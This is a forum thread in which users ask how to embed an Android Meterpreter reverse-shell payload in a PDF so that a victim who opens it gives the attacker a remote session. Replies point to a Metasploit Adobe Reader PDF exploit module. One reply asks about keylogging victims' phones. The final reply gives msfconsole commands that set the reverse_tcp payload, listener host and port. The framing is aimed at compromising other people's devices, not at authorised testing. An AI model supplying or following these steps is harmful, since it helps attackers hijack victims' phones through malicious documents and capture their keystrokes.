Forum Thread: Metasploit - Embedding an Android Payload into a PDF?

Hi there my hacking mates,

I recently fell in love with metasploit and currently I'm into pentesting Android devices. I already managed to drop an android meterpreter shell with help of an .apk, but I'd like to take it a step further.

Since there are quite a few ways (and exploits) for PDF documents for Windows, I was wondering if there is a way to embed an android meterpreter payload into an PDF.

I found a fileformat PDF exploit for Android devices in the Metasploit framework, but sadly I wasn't able to get it to work with an android meterpreter payload.

Is there a way to embed such a payload inside a PDF document, so when the user opens the PDF on their Android we will get a meterpreter session?

-B1337

8 Responses

It will be nice if you try to re-post this question . Even I , would like to know if there's any way to it

and I think we can explore this exploit
(exploit/android/fileformat/adobe_reader_pdf_js_interface)

We can use the

(exploit/android/fileformat/adobe_reader_pdf_js_interface)

exploit.

I guess there's no option for embedding payload in pdf. What we can do is create pdf using msf and then add pages in it using Acrobat.

but can u tell me how we can listen to the payload or what type of payload should we set to get a meterpreter session?

I have tried with msfvenom and saving it as a .pdf but it failed to open on android devices saying that its unsupported format

If there is a way of making it work I think it can get u somewhere

Bro i create the payload into the pdf and the pdf can be opened but the exploit comment is not work for my phone what can i do

is there a way to capture keystrokes from victims android device???
i'm asking about keylogger

*use exploit/android/fileformat/adobereaderpdfjsinterface

set payload android/meterpreter/reverse_tcp

set lhost 192.168.182.136 (your IP here)

set port 20068

exploit*

Share Your Thoughts

  • Hot
  • Active